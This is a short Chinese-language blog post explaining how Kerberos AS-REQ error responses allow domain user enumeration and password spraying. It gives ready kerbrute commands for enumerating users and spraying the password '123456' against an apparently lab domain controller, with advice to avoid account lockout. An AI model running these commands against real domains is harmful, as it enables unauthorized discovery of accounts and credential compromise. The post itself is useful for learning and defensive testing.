域用户枚举，密码喷洒

在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示错误，当用户名存在时，密码正确或者错误返回包结果也不一样，所以可以尝试域用户枚举和密码喷洒攻击。

都可以在域外使用，但是能与域控ping通。

ps:user.txt用户名文件格式不需要加域名

域内用户枚举

当主机不在域内时，可以通过域内用户枚举来探测域内用户。

kerbrute_windows_amd64.exe userenum --dc 192.168.10.10 -d hiro.com user.txt

密码错误次数过多可能导致用户的账户被锁定，所以用固定密码来跑用户名

kerbrute_windows_amd64.exe passwordspray --dc 192.168.10.10 -d hiro.com user.txt 123456

posted @ 2021-05-26 23:36 cAr7n 阅读(369) 评论(0) 编辑收藏举报

刷新页面返回顶部